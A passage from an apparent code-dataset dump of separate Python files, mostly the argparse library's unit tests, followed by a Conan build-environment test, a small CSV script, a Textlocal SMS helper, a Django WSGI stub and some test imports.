parser_signature = Sig(prog='PROG', usage='%(prog)s FOO')
argument_signatures = []
argument_group_signatures = []
usage = ('''\
usage: PROG FOO
''')
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
'''
version = ''
class TestHelpVariableExpansionNoArguments(HelpTestCase):
"""Test that variables are expanded properly with no arguments"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = []
argument_group_signatures = []
usage = ('''\
usage: PROG
''')
help = usage
version = ''
class TestHelpSuppressUsage(HelpTestCase):
"""Test that items can be suppressed in usage messages"""
parser_signature = Sig(prog='PROG', usage=argparse.SUPPRESS)
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
help = '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
usage = ''
version = ''
class TestHelpSuppressOptional(HelpTestCase):
"""Test that optional arguments can be suppressed in help messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('--foo', help=argparse.SUPPRESS),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG spam
'''
help = usage + '''\
positional arguments:
spam spam help
'''
version = ''
class TestHelpSuppressOptionalGroup(HelpTestCase):
"""Test that optional groups can be suppressed in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('group'), [Sig('--bar', help=argparse.SUPPRESS)]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpSuppressPositional(HelpTestCase):
"""Test that positional arguments can be suppressed in help messages"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help=argparse.SUPPRESS),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [--foo FOO]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpRequiredOptional(HelpTestCase):
"""Test that required options don't look optional"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo', required=True, help='foo help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] --foo FOO
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help
'''
version = ''
class TestHelpAlternatePrefixChars(HelpTestCase):
"""Test that options display with different prefix characters"""
parser_signature = Sig(prog='PROG', prefix_chars='^;', add_help=False)
argument_signatures = [
Sig('^^foo', action='store_true', help='foo help'),
Sig(';b', ';;bar', help='bar help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [^^foo] [;b BAR]
'''
help = usage + '''\
optional arguments:
^^foo foo help
;b BAR, ;;bar BAR bar help
'''
version = ''
class TestHelpNoHelpOptional(HelpTestCase):
"""Test that the --help argument can be suppressed help messages"""
parser_signature = Sig(prog='PROG', add_help=False)
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
--foo FOO foo help
'''
version = ''
class TestHelpVersionOptional(HelpTestCase):
"""Test that the --version argument can be suppressed help messages"""
parser_signature = Sig(prog='PROG', version='1.0')
argument_signatures = [
Sig('--foo', help='foo help'),
Sig('spam', help='spam help'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-v] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
--foo FOO foo help
'''
version = '''\
1.0
'''
class TestHelpNone(HelpTestCase):
"""Test that no errors occur if no help is specified"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('--foo'),
Sig('spam'),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [--foo FOO] spam
'''
help = usage + '''\
positional arguments:
spam
optional arguments:
-h, --help show this help message and exit
--foo FOO
'''
version = ''
class TestHelpTupleMetavar(HelpTestCase):
"""Test specifying metavar as a tuple"""
parser_signature = Sig(prog='PROG')
argument_signatures = [
Sig('-w', help='w', nargs='+', metavar=('W1', 'W2')),
Sig('-x', help='x', nargs='*', metavar=('X1', 'X2')),
Sig('-y', help='y', nargs=3, metavar=('Y1', 'Y2', 'Y3')),
Sig('-z', help='z', nargs='?', metavar=('Z1', )),
]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-w W1 [W2 ...]] [-x [X1 [X2 ...]]] [-y Y1 Y2 Y3] \
[-z [Z1]]
'''
help = usage + '''\
optional arguments:
-h, --help show this help message and exit
-w W1 [W2 ...] w
-x [X1 [X2 ...]] x
-y Y1 Y2 Y3 y
-z [Z1] z
'''
version = ''
class TestHelpRawText(HelpTestCase):
"""Test the RawTextHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.RawTextHelpFormatter,
description='Keep the formatting\n'
' exactly as it is written\n'
'\n'
'here\n')
argument_signatures = [
Sig('--foo', help=' foo help should also\n'
'appear as given here'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('title', description=' This text\n'
' should be indented\n'
' exactly like it is here\n'),
[Sig('--bar', help='bar help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar BAR] spam
'''
help = usage + '''\
Keep the formatting
exactly as it is written
here
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help should also
appear as given here
title:
This text
should be indented
exactly like it is here
--bar BAR bar help
'''
version = ''
class TestHelpRawDescription(HelpTestCase):
"""Test the RawTextHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.RawDescriptionHelpFormatter,
description='Keep the formatting\n'
' exactly as it is written\n'
'\n'
'here\n')
argument_signatures = [
Sig('--foo', help=' foo help should not\n'
' retain this odd formatting'),
Sig('spam', help='spam help'),
]
argument_group_signatures = [
(Sig('title', description=' This text\n'
' should be indented\n'
' exactly like it is here\n'),
[Sig('--bar', help='bar help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar BAR] spam
'''
help = usage + '''\
Keep the formatting
exactly as it is written
here
positional arguments:
spam spam help
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help should not retain this odd formatting
title:
This text
should be indented
exactly like it is here
--bar BAR bar help
'''
version = ''
class TestHelpArgumentDefaults(HelpTestCase):
"""Test the ArgumentDefaultsHelpFormatter"""
parser_signature = Sig(
prog='PROG', formatter_class=argparse.ArgumentDefaultsHelpFormatter,
description='description')
argument_signatures = [
Sig('--foo', help='foo help - oh and by the way, %(default)s'),
Sig('--bar', action='store_true', help='bar help'),
Sig('spam', help='spam help'),
Sig('badger', nargs='?', default='wooden', help='badger help'),
]
argument_group_signatures = [
(Sig('title', description='description'),
[Sig('--baz', type=int, default=42, help='baz help')]),
]
usage = '''\
usage: PROG [-h] [--foo FOO] [--bar] [--baz BAZ] spam [badger]
'''
help = usage + '''\
description
positional arguments:
spam spam help
badger badger help (default: wooden)
optional arguments:
-h, --help show this help message and exit
--foo FOO foo help - oh and by the way, None
--bar bar help (default: False)
title:
description
--baz BAZ baz help (default: 42)
'''
version = ''
class TestHelpVersionAction(HelpTestCase):
"""Test the default help for the version action"""
parser_signature = Sig(prog='PROG', description='description')
argument_signatures = [Sig('-V', '--version', action='version', version='3.6')]
argument_group_signatures = []
usage = '''\
usage: PROG [-h] [-V]
'''
help = usage + '''\
description
optional arguments:
-h, --help show this help message and exit
-V, --version show program's version number and exit
'''
version = ''
class TestHelpSubparsersOrdering(HelpTestCase):
"""Test ordering of subcommands in help matches the code"""
parser_signature = Sig(prog='PROG',
description='display some subcommands',
version='0.1')
subparsers_signatures = [Sig(name=name)
for name in ('a', 'b', 'c', 'd', 'e')]
usage = '''\
usage: PROG [-h] [-v] {a,b,c,d,e} ...
'''
help = usage + '''\
display some subcommands
positional arguments:
{a,b,c,d,e}
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
'''
version = '''\
0.1
'''
class TestHelpSubparsersWithHelpOrdering(HelpTestCase):
"""Test ordering of subcommands in help matches the code"""
parser_signature = Sig(prog='PROG',
description='display some subcommands',
version='0.1')
subcommand_data = (('a', 'a subcommand help'),
('b', 'b subcommand help'),
('c', 'c subcommand help'),
('d', 'd subcommand help'),
('e', 'e subcommand help'),
)
subparsers_signatures = [Sig(name=name, help=help)
for name, help in subcommand_data]
usage = '''\
usage: PROG [-h] [-v] {a,b,c,d,e} ...
'''
help = usage + '''\
display some subcommands
positional arguments:
{a,b,c,d,e}
a a subcommand help
b b subcommand help
c c subcommand help
d d subcommand help
e e subcommand help
optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit
'''
version = '''\
0.1
'''
# =====================================
# Optional/Positional constructor tests
# =====================================
class TestInvalidArgumentConstructors(TestCase):
"""Test a bunch of invalid Argument constructors"""
def assertTypeError(self, *args, **kwargs):
parser = argparse.ArgumentParser()
self.assertRaises(TypeError, parser.add_argument,
*args, **kwargs)
def assertValueError(self, *args, **kwargs):
parser = argparse.ArgumentParser()
self.assertRaises(ValueError, parser.add_argument,
*args, **kwargs)
def test_invalid_keyword_arguments(self):
self.assertTypeError('-x', bar=None)
self.assertTypeError('-y', callback='foo')
self.assertTypeError('-y', callback_args=())
self.assertTypeError('-y', callback_kwargs={})
def test_missing_destination(self):
self.assertTypeError()
for action in ['append', 'store']:
self.assertTypeError(action=action)
def test_invalid_option_strings(self):
self.assertValueError('--')
self.assertValueError('---')
def test_invalid_type(self):
self.assertValueError('--foo', type='int')
self.assertValueError('--foo', type=(int, float))
def test_invalid_action(self):
self.assertValueError('-x', action='foo')
self.assertValueError('foo', action='baz')
self.assertValueError('--foo', action=('store', 'append'))
parser = argparse.ArgumentParser()
try:
parser.add_argument("--foo", action="store-true")
except ValueError:
e = sys.exc_info()[1]
expected = 'unknown action'
msg = 'expected %r, found %r' % (expected, e)
self.assertTrue(expected in str(e), msg)
def test_multiple_dest(self):
parser = argparse.ArgumentParser()
parser.add_argument(dest='foo')
try:
parser.add_argument('bar', dest='baz')
except ValueError:
e = sys.exc_info()[1]
expected = 'dest supplied twice for positional argument'
msg = 'expected %r, found %r' % (expected, e)
self.assertTrue(expected in str(e), msg)
def test_no_argument_actions(self):
for action in ['store_const', 'store_true', 'store_false',
'append_const', 'count']:
for attrs in [dict(type=int), dict(nargs='+'),
dict(choices='ab')]:
self.assertTypeError('-x', action=action, **attrs)
def test_no_argument_no_const_actions(self):
# options with zero arguments
for action in ['store_true', 'store_false', 'count']:
# const is always disallowed
self.assertTypeError('-x', const='foo', action=action)
# nargs is always disallowed
self.assertTypeError('-x', nargs='*', action=action)
def test_more_than_one_argument_actions(self):
for action in ['store', 'append']:
# nargs=0 is disallowed
self.assertValueError('-x', nargs=0, action=action)
self.assertValueError('spam', nargs=0, action=action)
# const is disallowed with non-optional arguments
for nargs in [1, '*', '+']:
self.assertValueError('-x', const='foo',
nargs=nargs, action=action)
self.assertValueError('spam', const='foo',
nargs=nargs, action=action)
def test_required_const_actions(self):
for action in ['store_const', 'append_const']:
# nargs is always disallowed
self.assertTypeError('-x', nargs='+', action=action)
def test_parsers_action_missing_params(self):
self.assertTypeError('command', action='parsers')
self.assertTypeError('command', action='parsers', prog='PROG')
self.assertTypeError('command', action='parsers',
parser_class=argparse.ArgumentParser)
def test_required_positional(self):
self.assertTypeError('foo', required=True)
def test_user_defined_action(self):
class Success(Exception):
pass
class Action(object):
def __init__(self,
option_strings,
dest,
const,
default,
required=False):
if dest == 'spam':
if const is Success:
if default is Success:
raise Success()
def __call__(self, *args, **kwargs):
pass
parser = argparse.ArgumentParser()
self.assertRaises(Success, parser.add_argument, '--spam',
action=Action, default=Success, const=Success)
self.assertRaises(Success, parser.add_argument, 'spam',
action=Action, default=Success, const=Success)
# ================================
# Actions returned by add_argument
# ================================
class TestActionsReturned(TestCase):
def test_dest(self):
parser = argparse.ArgumentParser()
action = parser.add_argument('--foo')
self.assertEqual(action.dest, 'foo')
action = parser.add_argument('-b', '--bar')
self.assertEqual(action.dest, 'bar')
action = parser.add_argument('-x', '-y')
self.assertEqual(action.dest, 'x')
def test_misc(self):
parser = argparse.ArgumentParser()
action = parser.add_argument('--foo', nargs='?', const=42,
default=84, type=int, choices=[1, 2],
help='FOO', metavar='BAR', dest='baz')
self.assertEqual(action.nargs, '?')
self.assertEqual(action.const, 42)
self.assertEqual(action.default, 84)
self.assertEqual(action.type, int)
self.assertEqual(action.choices, [1, 2])
self.assertEqual(action.help, 'FOO')
self.assertEqual(action.metavar, 'BAR')
self.assertEqual(action.dest, 'baz')
# ================================
# Argument conflict handling tests
# ================================
class TestConflictHandling(TestCase):
def test_bad_type(self):
self.assertRaises(ValueError, argparse.ArgumentParser,
conflict_handler='foo')
def test_conflict_error(self):
parser = argparse.ArgumentParser()
parser.add_argument('-x')
self.assertRaises(argparse.ArgumentError,
parser.add_argument, '-x')
parser.add_argument('--spam')
self.assertRaises(argparse.ArgumentError,
parser.add_argument, '--spam')
def test_resolve_error(self):
get_parser = argparse.ArgumentParser
parser = get_parser(prog='PROG', conflict_handler='resolve')
parser.add_argument('-x', help='OLD X')
parser.add_argument('-x', help='NEW X')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [-x X]
optional arguments:
-h, --help show this help message and exit
-x X NEW X
'''))
parser.add_argument('--spam', metavar='OLD_SPAM')
parser.add_argument('--spam', metavar='NEW_SPAM')
self.assertEqual(parser.format_help(), textwrap.dedent('''\
usage: PROG [-h] [-x X] [--spam NEW_SPAM]
optional arguments:
-h, --help show this help message and exit
-x X NEW X
--spam NEW_SPAM
'''))
# =============================
# Help and Version option tests
# =============================
class TestOptionalsHelpVersionActions(TestCase):
"""Test the help and version actions"""
def _get_error(self, func, *args, **kwargs):
try:
func(*args, **kwargs)
except ArgumentParserError:
return sys.exc_info()[1]
else:
self.assertRaises(ArgumentParserError, func, *args, **kwargs)
def assertPrintHelpExit(self, parser, args_str):
self.assertEqual(
parser.format_help(),
self._get_error(parser.parse_args, args_str.split()).stdout)
def assertPrintVersionExit(self, parser, args_str):
self.assertEqual(
parser.format_version(),
self._get_error(parser.parse_args, args_str.split()).stderr)
def assertArgumentParserError(self, parser, *args):
self.assertRaises(ArgumentParserError, parser.parse_args, args)
def test_version(self):
parser = ErrorRaisingArgumentParser(version='1.0')
self.assertPrintHelpExit(parser, '-h')
self.assertPrintHelpExit(parser, '--help')
self.assertPrintVersionExit(parser, '-v')
self.assertPrintVersionExit(parser, '--version')
def test_version_format(self):
parser = ErrorRaisingArgumentParser(prog='PPP', version='%(prog)s 3.5')
msg = self._get_error(parser.parse_args, ['-v']).stderr
self.assertEqual('PPP 3.5\n', msg)
def test_version_no_help(self):
parser = ErrorRaisingArgumentParser(add_help=False, version='1.0')
self.assertArgumentParserError(parser, '-h')
self.assertArgumentParserError(parser, '--help')
self.assertPrintVersionExit(parser, '-v')
self.assertPrintVersionExit(parser, '--version')
def test_version_action(self):
parser = ErrorRaisingArgumentParser(prog='XXX')
parser.add_argument('-V', action='version', version='%(prog)s 3.7')
msg = self._get_error(parser.parse_args, ['-V']).stderr
self.assertEqual('XXX 3.7\n', msg)
def test_no_help(self):
parser = ErrorRaisingArgumentParser(add_help=False)
self.assertArgumentParserError(parser, '-h')
self.assertArgumentParserError(parser, '--help')
self.assertArgumentParserError(parser, '-v')
self.assertArgumentParserError(parser, '--version')
def test_alternate_help_version(self):
parser = ErrorRaisingArgumentParser()
parser.add_argument('-x', action='help')
parser.add_argument('-y', action='version')
self.assertPrintHelpExit(parser, '-x')
self.assertPrintVersionExit(parser, '-y')
self.assertArgumentParserError(parser, '-v')
self.assertArgumentParserError(parser, '--version')
def test_help_version_extra_arguments(self):
parser = ErrorRaisingArgumentParser(version='1.0')
parser.add_argument('-x', action='store_true')
parser.add_argument('y')
# try all combinations of valid prefixes and suffixes
valid_prefixes = ['', '-x', 'foo', '-x bar', 'baz -x']
valid_suffixes = valid_prefixes + ['--bad-option', 'foo bar baz']
for prefix in valid_prefixes:
for suffix in valid_suffixes:
format = '%s %%s %s' % (prefix, suffix)
self.assertPrintHelpExit(parser, format % '-h')
self.assertPrintHelpExit(parser, format % '--help')
self.assertPrintVersionExit(parser, format % '-v')
self.assertPrintVersionExit(parser, format % '--version')
# ======================
# str() and repr() tests
# ======================
class TestStrings(TestCase):
"""Test str() and repr() on Optionals and Positionals"""
def assertStringEqual(self, obj, result_string):
for func in [str, repr]:
self.assertEqual(func(obj), result_string)
def test_optional(self):
option = argparse.Action(
option_strings=['--foo', '-a', '-b'],
dest='b',
type='int',
nargs='+',
default=42,
choices=[1, 2, 3],
help='HELP',
metavar='METAVAR')
string = (
"Action(option_strings=['--foo', '-a', '-b'], dest='b', "
"nargs='+', const=None, default=42, type='int', "
"choices=[1, 2, 3], help='HELP', metavar='METAVAR')")
self.assertStringEqual(option, string)
def test_argument(self):
argument = argparse.Action(
option_strings=[],
dest='x',
type=float,
nargs='?',
default=2.5,
choices=[0.5, 1.5, 2.5],
help='H HH H',
metavar='MV MV MV')
string = (
"Action(option_strings=[], dest='x', nargs='?', "
"const=None, default=2.5, type=%r, choices=[0.5, 1.5, 2.5], "
"help='H HH H', metavar='MV MV MV')" % float)
self.assertStringEqual(argument, string)
def test_namespace(self):
ns = argparse.Namespace(foo=42, bar='spam')
string = "Namespace(bar='spam', foo=42)"
self.assertStringEqual(ns, string)
def test_parser(self):
parser = argparse.ArgumentParser(prog='PROG')
string = (
"ArgumentParser(prog='PROG', usage=None, description=None, "
"version=None, formatter_class=%r, conflict_handler='error', "
"add_help=True)" % argparse.HelpFormatter)
self.assertStringEqual(parser, string)
# ===============
# Namespace tests
# ===============
class TestNamespace(TestCase):
def test_constructor(self):
ns = argparse.Namespace()
self.assertRaises(AttributeError, getattr, ns, 'x')
ns = argparse.Namespace(a=42, b='spam')
self.assertEqual(ns.a, 42)
self.assertEqual(ns.b, 'spam')
def test_equality(self):
ns1 = argparse.Namespace(a=1, b=2)
ns2 = argparse.Namespace(b=2, a=1)
ns3 = argparse.Namespace(a=1)
ns4 = argparse.Namespace(b=2)
self.assertEqual(ns1, ns2)
self.assertNotEqual(ns1, ns3)
self.assertNotEqual(ns1, ns4)
self.assertNotEqual(ns2, ns3)
self.assertNotEqual(ns2, ns4)
self.assertTrue(ns1 != ns3)
self.assertTrue(ns1 != ns4)
self.assertTrue(ns2 != ns3)
self.assertTrue(ns2 != ns4)
# ===================
# File encoding tests
# ===================
class TestEncoding(TestCase):
def _test_module_encoding(self, path):
path, _ = os.path.splitext(path)
path += ".py"
with codecs.open(path, 'r', 'utf8') as f:
f.read()
def test_argparse_module_encoding(self):
self._test_module_encoding(argparse.__file__)
def test_test_argparse_module_encoding(self):
self._test_module_encoding(__file__)
# ===================
# ArgumentError tests
# ===================
class TestArgumentError(TestCase):
def test_argument_error(self):
msg = "my error here"
error = argparse.ArgumentError(None, msg)
self.assertEqual(str(error), msg)
# =======================
# ArgumentTypeError tests
# =======================
class TestArgumentTypeError(TestCase):
def test_argument_type_error(self):
def spam(string):
raise argparse.ArgumentTypeError('spam!')
parser = ErrorRaisingArgumentParser(prog='PROG', add_help=False)
parser.add_argument('x', type=spam)
try:
parser.parse_args(['XXX'])
except ArgumentParserError:
expected = 'usage: PROG x\nPROG: error: argument x: spam!\n'
msg = sys.exc_info()[1].stderr
self.assertEqual(expected, msg)
else:
self.fail()
# ======================
# parse_known_args tests
# ======================
class TestParseKnownArgs(TestCase):
def test_optionals(self):
parser = argparse.ArgumentParser()
parser.add_argument('--foo')
args, extras = parser.parse_known_args('--foo F --bar --baz'.split())
self.assertEqual(NS(foo='F'), args)
self.assertEqual(['--bar', '--baz'], extras)
def test_mixed(self):
parser = argparse.ArgumentParser()
parser.add_argument('-v', nargs='?', const=1, type=int)
parser.add_argument('--spam', action='store_false')
parser.add_argument('badger')
argv = ["B", "C", "--foo", "-v", "3", "4"]
args, extras = parser.parse_known_args(argv)
self.assertEqual(NS(v=3, spam=True, badger="B"), args)
self.assertEqual(["C", "--foo", "4"], extras)
# ==========================
# add_argument metavar tests
# ==========================
class TestAddArgumentMetavar(TestCase):
EXPECTED_MESSAGE = "length of metavar tuple does not match nargs"
def do_test_no_exception(self, nargs, metavar):
parser = argparse.ArgumentParser()
parser.add_argument("--foo", nargs=nargs, metavar=metavar)
def do_test_exception(self, nargs, metavar):
parser = argparse.ArgumentParser()
with self.assertRaises(ValueError) as cm:
parser.add_argument("--foo", nargs=nargs, metavar=metavar)
self.assertEqual(cm.exception.args[0], self.EXPECTED_MESSAGE)
# Unit tests for different values of metavar when nargs=None
def test_nargs_None_metavar_string(self):
self.do_test_no_exception(nargs=None, metavar="1")
def test_nargs_None_metavar_length0(self):
self.do_test_exception(nargs=None, metavar=tuple())
def test_nargs_None_metavar_length1(self):
self.do_test_no_exception(nargs=None, metavar=("1"))
def test_nargs_None_metavar_length2(self):
self.do_test_exception(nargs=None, metavar=("1", "2"))
def test_nargs_None_metavar_length3(self):
self.do_test_exception(nargs=None, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=?
def test_nargs_optional_metavar_string(self):
self.do_test_no_exception(nargs="?", metavar="1")
def test_nargs_optional_metavar_length0(self):
self.do_test_exception(nargs="?", metavar=tuple())
def test_nargs_optional_metavar_length1(self):
self.do_test_no_exception(nargs="?", metavar=("1"))
def test_nargs_optional_metavar_length2(self):
self.do_test_exception(nargs="?", metavar=("1", "2"))
def test_nargs_optional_metavar_length3(self):
self.do_test_exception(nargs="?", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=*
def test_nargs_zeroormore_metavar_string(self):
self.do_test_no_exception(nargs="*", metavar="1")
def test_nargs_zeroormore_metavar_length0(self):
self.do_test_exception(nargs="*", metavar=tuple())
def test_nargs_zeroormore_metavar_length1(self):
self.do_test_no_exception(nargs="*", metavar=("1"))
def test_nargs_zeroormore_metavar_length2(self):
self.do_test_no_exception(nargs="*", metavar=("1", "2"))
def test_nargs_zeroormore_metavar_length3(self):
self.do_test_exception(nargs="*", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=+
def test_nargs_oneormore_metavar_string(self):
self.do_test_no_exception(nargs="+", metavar="1")
def test_nargs_oneormore_metavar_length0(self):
self.do_test_exception(nargs="+", metavar=tuple())
def test_nargs_oneormore_metavar_length1(self):
self.do_test_no_exception(nargs="+", metavar=("1"))
def test_nargs_oneormore_metavar_length2(self):
self.do_test_no_exception(nargs="+", metavar=("1", "2"))
def test_nargs_oneormore_metavar_length3(self):
self.do_test_exception(nargs="+", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=...
def test_nargs_remainder_metavar_string(self):
self.do_test_no_exception(nargs="...", metavar="1")
def test_nargs_remainder_metavar_length0(self):
self.do_test_no_exception(nargs="...", metavar=tuple())
def test_nargs_remainder_metavar_length1(self):
self.do_test_no_exception(nargs="...", metavar=("1"))
def test_nargs_remainder_metavar_length2(self):
self.do_test_no_exception(nargs="...", metavar=("1", "2"))
def test_nargs_remainder_metavar_length3(self):
self.do_test_no_exception(nargs="...", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=A...
def test_nargs_parser_metavar_string(self):
self.do_test_no_exception(nargs="A...", metavar="1")
def test_nargs_parser_metavar_length0(self):
self.do_test_exception(nargs="A...", metavar=tuple())
def test_nargs_parser_metavar_length1(self):
self.do_test_no_exception(nargs="A...", metavar=("1"))
def test_nargs_parser_metavar_length2(self):
self.do_test_exception(nargs="A...", metavar=("1", "2"))
def test_nargs_parser_metavar_length3(self):
self.do_test_exception(nargs="A...", metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=1
def test_nargs_1_metavar_string(self):
self.do_test_no_exception(nargs=1, metavar="1")
def test_nargs_1_metavar_length0(self):
self.do_test_exception(nargs=1, metavar=tuple())
def test_nargs_1_metavar_length1(self):
self.do_test_no_exception(nargs=1, metavar=("1"))
def test_nargs_1_metavar_length2(self):
self.do_test_exception(nargs=1, metavar=("1", "2"))
def test_nargs_1_metavar_length3(self):
self.do_test_exception(nargs=1, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=2
def test_nargs_2_metavar_string(self):
self.do_test_no_exception(nargs=2, metavar="1")
def test_nargs_2_metavar_length0(self):
self.do_test_exception(nargs=2, metavar=tuple())
def test_nargs_2_metavar_length1(self):
self.do_test_no_exception(nargs=2, metavar=("1"))
def test_nargs_2_metavar_length2(self):
self.do_test_no_exception(nargs=2, metavar=("1", "2"))
def test_nargs_2_metavar_length3(self):
self.do_test_exception(nargs=2, metavar=("1", "2", "3"))
# Unit tests for different values of metavar when nargs=3
def test_nargs_3_metavar_string(self):
self.do_test_no_exception(nargs=3, metavar="1")
def test_nargs_3_metavar_length0(self):
self.do_test_exception(nargs=3, metavar=tuple())
def test_nargs_3_metavar_length1(self):
self.do_test_no_exception(nargs=3, metavar=("1"))
def test_nargs_3_metavar_length2(self):
self.do_test_exception(nargs=3, metavar=("1", "2"))
def test_nargs_3_metavar_length3(self):
self.do_test_no_exception(nargs=3, metavar=("1", "2", "3"))
# ============================
# from argparse import * tests
# ============================
class TestImportStar(TestCase):
def test(self):
for name in argparse.__all__:
self.assertTrue(hasattr(argparse, name))
def test_all_exports_everything_but_modules(self):
items = [
name
for name, value in vars(argparse).items()
if not name.startswith("_")
if not inspect.ismodule(value)
]
self.assertEqual(sorted(items), sorted(argparse.__all__))
def test_main():
# silence warnings about version argument - these are expected
with test_support.check_warnings(
('The "version" argument to ArgumentParser is deprecated.',
DeprecationWarning),
('The (format|print)_version method is deprecated',
DeprecationWarning)):
test_support.run_unittest(__name__)
# Remove global references to avoid looking like we have refleaks.
RFile.seen = {}
WFile.seen = set()
if __name__ == '__main__':
test_main()
|
py
|
1a5f06d9037b32a5c80f70a7ed1b21a2b3bd8a84
|
import os
import platform
import textwrap
import unittest
from conans.test.utils.tools import TestClient
from conans.util.runners import check_output_runner
class VirtualBuildEnvTest(unittest.TestCase):
@unittest.skipUnless(platform.system() == "Windows", "needs Windows")
def test_delimiter_error(self):
# https://github.com/conan-io/conan/issues/3080
conanfile = """from conans import ConanFile
class TestConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
"""
client = TestClient()
client.save({"conanfile.py": conanfile})
client.run('install . -g virtualbuildenv -s os=Windows -s compiler="Visual Studio"'
' -s compiler.runtime=MD -s compiler.version=15')
bat = client.load("environment_build.bat.env")
self.assertIn("UseEnv=True", bat)
self.assertIn('CL=-MD -DNDEBUG -O2 -Ob2 %CL%', bat)
def test_environment_deactivate(self):
if platform.system() == "Windows":
""" This test fails. The deactivation script takes the value of some envvars set by
the activation script to recover the previous values (set PATH=OLD_PATH). As this
test is running each command in a different shell, the envvar OLD_PATH that has
been set by the 'activate' script doesn't exist when we run 'deactivate' in a
different shell...
TODO: Remove this test
"""
self.skipTest("This won't work in Windows")
in_windows = platform.system() == "Windows"
env_cmd = "set" if in_windows else "env"
extension = "bat" if in_windows else "sh"
def env_output_to_dict(env_output):
env = {}
for line in env_output.splitlines():
tmp = line.split("=")
# OLDPWD is cleared when a child script is started
if tmp[0] not in ["SHLVL", "_", "PS1", "OLDPWD"]:
env[tmp[0]] = tmp[1].replace("\\", "/")
return env
def get_cmd(script_name):
if in_windows:
return "%s && set" % script_name
else:
return "bash -c 'source %s && env'" % script_name
conanfile = textwrap.dedent("""
from conans import ConanFile
class TestConan(ConanFile):
settings = "os", "compiler", "arch", "build_type"
generators = "virtualbuildenv"
""")
client = TestClient(path_with_spaces=False)
client.save({"conanfile.py": conanfile})
client.run("install .")
output = check_output_runner(env_cmd)
normal_environment = env_output_to_dict(output)
client.run("install .")
act_build_file = os.path.join(client.current_folder, "activate_build.%s" % extension)
deact_build_file = os.path.join(client.current_folder, "deactivate_build.%s" % extension)
self.assertTrue(os.path.exists(act_build_file))
self.assertTrue(os.path.exists(deact_build_file))
output = check_output_runner(get_cmd(act_build_file))
activate_environment = env_output_to_dict(output)
self.assertNotEqual(normal_environment, activate_environment)
output = check_output_runner(get_cmd(deact_build_file))
deactivate_environment = env_output_to_dict(output)
self.assertDictEqual(normal_environment, deactivate_environment)
|
py
|
1a5f0713ccf4857840a63ec0f7a63a7c660d6769
|
import csv
lang = set()
with open('tasks-skills.csv') as f:
    c = csv.reader(f, delimiter=',')
    next(c)  # skip the header row
    for row in c:
        lang.add(row[2])  # a set ignores duplicates, so no membership check is needed
print(len(lang))
print(lang)
|
py
|
1a5f075a84a7b2a4f3accf3503969ec3993c0265
|
import os
import requests
url = "https://api.textlocal.in/send/"
def send_sms(phone, message):
params = {
"apikey": os.getenv("TEXTLOCAL_API_KEY"),
"numbers": phone,
"message": message,
"sender": "CTZNVS",
"test": True,
}
response = requests.get(url, params=params)
return response.text
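# Example usage (sketch; the phone number is hypothetical and TEXTLOCAL_API_KEY must
# be set in the environment):
#   send_sms("919999999999", "Hello from CTZNVS")
# Note that the params include "test": True, which keeps the request in Textlocal's
# test mode rather than delivering a real message.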
|
py
|
1a5f08a24762b1e113ed0db6d59c3ecc64dd0ca2
|
"""
WSGI config for process_rss_feeds project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'process_rss_feeds.settings')
application = get_wsgi_application()
|
py
|
1a5f0abbf58d085aa0f1d31990af9737f145f28c
|
import logging
import pytest
from ocs_ci.framework.testlib import ManageTest, tier1
from ocs_ci.ocs.resources import pod
